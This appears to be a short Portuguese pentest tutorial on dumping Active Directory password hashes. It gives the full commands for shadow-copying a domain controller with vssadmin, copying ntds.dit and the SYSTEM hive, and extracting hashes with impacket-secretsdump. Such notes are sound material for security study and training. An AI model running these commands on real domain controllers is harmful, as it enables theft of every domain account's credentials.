Obtendo hashes em servidores AD

Quando o servidor possui o AD, ele centraliza vários grupos/contas de usuários, cria vários departamento com diversas contas com diversos tipos de permissões dentro do AD. Se utilizarmos as técnicas de obter o sam e o system, iremos apenas obter as hashes do windows server local e não das contas que estão no AD. Para extrair as contas, precisamos acessar o NTDS.DIT.

Quando falamos de windows server com AD instalado, ele vai possuir um diretório diferente dentro dele. O arquivo responsável por armazenar as informações do AD fica em C:\Windows\NTDS\ntds.dit. Porém esse arquivo também é protegido como os outros dois.

Uma técnica que podemos utilizar, é usar o vssadmin. Que basicamente irá criar uma cópia sombra, onde foi criado um volume novo, e isso não fica em processo em uso pois é uma cópia.

vssadmin create shadow /for=c:

Para acessar o diretório e salvar em C:

copy <cópia sombra>\windows\ntds\ntds.dit c:\ntds.dit

Precisamos também baixar o arquivo system.

copy <cópia sombra>\windows\system32\config\system c:\system1

Depois de baixar esses arquivos para nossa máquina, podemos utilizar o impacket.

impacket-secretsdump -ntds ntds.dit -system system1 LOCAL